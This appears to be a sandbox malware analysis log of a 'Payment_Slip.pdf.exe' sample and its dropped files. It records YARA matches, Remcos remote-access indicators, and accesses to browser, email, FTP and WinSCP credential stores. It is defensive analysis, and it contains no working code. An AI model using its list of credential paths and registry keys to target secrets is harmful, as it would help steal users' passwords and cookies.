Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0040A0B0 GetLocalTime,wsprintfW, 11_2_0040A0B0
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_004195F8 GetUserNameW, 11_2_004195F8
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_004466BF _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 11_2_004466BF
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_0041739B GetVersionExW, 14_2_0041739B
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

Source: Yara match File source: 12.0.host.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.conserver.exe.d70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000000.1218959335.0000000000D72000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.1218869543.0000000000242000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Roaming\host.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\conserver.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe, type: DROPPED
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 0000001B.00000002.3620392043.0000000002FBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.3621446588.0000000002578000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3622366959.00000000026F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3619471195.0000000003002000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.3620793390.0000000002A12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.3621446588.0000000002597000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3622366959.0000000002717000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.1539307669.0000000003232000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.3620392043.0000000002F95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: host.exe PID: 4860, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: conserver.exe PID: 8164, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Windows Update.exe PID: 8368, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mykksg.exe PID: 8492, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Windows Update.exe PID: 8628, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mykksg.exe PID: 8792, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: 7.2.mHTmhPhJy.exe.416f180.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.mHTmhPhJy.exe.41e47a0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.mHTmhPhJy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Payment_Slip.pdf.exe.3483d88.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Payment_Slip.pdf.exe.340e768.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.dwn.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.dwn.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.mHTmhPhJy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.mHTmhPhJy.exe.41e47a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.mHTmhPhJy.exe.416f180.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Payment_Slip.pdf.exe.3483d88.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Payment_Slip.pdf.exe.340e768.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.1203872894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1205028524.0000000000BBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3614974815.0000000002ECF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3614283187.00000000013DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.1224623594.00000000005FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.1223302187.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1251111243.000000000416F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.1224421328.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3611370738.0000000001330000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1187261780.000000000340E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Payment_Slip.pdf.exe PID: 8060, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Payment_Slip.pdf.exe PID: 7544, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mHTmhPhJy.exe PID: 7856, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mHTmhPhJy.exe PID: 5392, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: dwn.exe PID: 7300, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\dwn.exe, type: DROPPED
Source: Yara match File source: 0000001B.00000002.3620392043.0000000002FBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.3621446588.0000000002597000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3622366959.0000000002717000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: host.exe PID: 4860, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mykksg.exe PID: 8492, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mykksg.exe PID: 8792, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 11_2_0040A953
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 17_2_0040A953
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 11_2_0040AA71
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: \key3.db 11_2_0040AA71
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 17_2_0040AA71
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: \key3.db 17_2_0040AA71
Source: C:\Users\user\AppData\Roaming\host.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Key opened: HKEY_CURRENT_USER\Software\Paltalk
Source: C:\Users\user\AppData\Roaming\host.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\host.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\host.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\host.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Local\Temp\conserver.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\conserver.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: ESMTPPassword 15_2_004033E2
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 15_2_00402DA5
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 15_2_00402DA5
Source: Yara match File source: Process Memory Space: Payment_Slip.pdf.exe PID: 6592, type: MEMORYSTR
Source: Yara match File source: 0000001A.00000002.3620793390.0000000002AB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3619471195.0000000003002000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.3620793390.0000000002A12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3619471195.00000000030AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.1539307669.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.1539307669.0000000003232000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: host.exe PID: 4860, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: conserver.exe PID: 8164, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Windows Update.exe PID: 8368, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mykksg.exe PID: 8492, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Windows Update.exe PID: 8628, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mykksg.exe PID: 8792, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-TWFFFD
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-TWFFFD
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-TWFFFD
Source: Yara match File source: 12.0.host.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.conserver.exe.d70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000000.1218959335.0000000000D72000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.1218869543.0000000000242000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Roaming\host.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\conserver.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe, type: DROPPED
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 0000001B.00000002.3620392043.0000000002FBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.3621446588.0000000002578000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3622366959.00000000026F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3619471195.0000000003002000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.3620793390.0000000002A12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.3621446588.0000000002597000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3622366959.0000000002717000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.1539307669.0000000003232000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.3620392043.0000000002F95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: host.exe PID: 4860, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: conserver.exe PID: 8164, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Windows Update.exe PID: 8368, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mykksg.exe PID: 8492, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Windows Update.exe PID: 8628, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mykksg.exe PID: 8792, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: 7.2.mHTmhPhJy.exe.416f180.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.mHTmhPhJy.exe.41e47a0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.mHTmhPhJy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Payment_Slip.pdf.exe.3483d88.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Payment_Slip.pdf.exe.340e768.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.dwn.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.dwn.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.mHTmhPhJy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.mHTmhPhJy.exe.41e47a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.mHTmhPhJy.exe.416f180.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Payment_Slip.pdf.exe.3483d88.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Payment_Slip.pdf.exe.340e768.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.1203872894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1205028524.0000000000BBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3614974815.0000000002ECF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3614283187.00000000013DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.1224623594.00000000005FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.1223302187.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1251111243.000000000416F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.1224421328.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3611370738.0000000001330000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1187261780.000000000340E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Payment_Slip.pdf.exe PID: 8060, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Payment_Slip.pdf.exe PID: 7544, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mHTmhPhJy.exe PID: 7856, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mHTmhPhJy.exe PID: 5392, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: dwn.exe PID: 7300, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\dwn.exe, type: DROPPED
Source: Yara match File source: 0000001B.00000002.3620392043.0000000002FBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.3621446588.0000000002597000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3622366959.0000000002717000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: host.exe PID: 4860, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mykksg.exe PID: 8492, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mykksg.exe PID: 8792, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: cmd.exe 11_2_0040567A
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: cmd.exe 17_2_0040567A